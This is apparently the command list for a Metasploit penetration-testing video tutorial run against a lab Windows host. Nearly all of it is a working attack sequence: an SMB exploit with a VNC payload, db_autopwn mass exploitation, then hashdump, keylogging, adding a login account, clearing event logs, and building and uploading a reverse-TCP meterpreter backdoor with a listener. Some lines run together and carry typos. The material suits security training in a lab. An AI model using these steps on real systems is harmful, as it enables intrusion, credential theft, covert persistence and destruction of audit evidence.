cd /pentest/exploits/framework3/
./msfconsole
db_create g0tmi1k
db_hosts
db_add_host 10.0.0.4
db_hosts
#show ##Show everything! [wasn't in video]use windows/smb/ms06_040_netapi
#use windows/dcerpc/ms03_026_dcom ##Different exploit, didn't find it as reliable#set paypload windows/shell_bind_tcp ##Could do a windows shell (not as powerful as meterpreter)#set payload windows/meterpreter/reverse_tcp ##Could do a meterpreter (but we do it later!)set payload windows/vncinject/bind_tcp
show options
set lhost 10.0.0.6
show options
exploit
db_del_host 10.0.0.4
db_hosts
db_nmap -n 1O 10.0.0.1-5
db_hosts
db_autopwn -t -p -e
sessions -l
sessoins -i 1
sysinfo
#ipconfig ##IP information [wasn't in video]idletime
ps
kill[number]getuid
#migrate // getsystem // use priv ##If the exploit doesn't have system privileges! [wasn't in video]hashdump
# execute ## Runs a command [wasn't in video]shell
pwdls
cd C:/
ls
mkdir g0tmi1k
ls
cd g0tmi1k
cat C:/boot.ini
download C:/boot.ini /tmp/boot.ini
./msfpayload windows/meterpreter/reverse_tcp lhost=10.0.0.6 X > /tmp/g0tmi1k.exe
upload /tmp/g0tmi1k.exe C:/g0tmi1k/g0tmi1k.exe
run getgui -u g0tmi1k -p haveyou
run keylogrecorder
## More scripts: /pentest/exploits/framework3/scripts/meterpreter#run scraper ##Gets information about target, dumps reg etc[wasn't in video]#run vnc ##Setups VNC [wasn't in video]#run uploadexec ##Upload and run a program [wasn't in video]clearev
exit -y
exit -y
##Start fresh for the backdoor!./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.6
exploit
## Somehow run: C:\g0tmi1k\g0tmi1k.exe
Notes
Made a few slip-ups in the video and something went wrong with keylogrecorder.
This is only the basic stuff - it can do ALOT more! See commands for a few more basic things which I didnt do.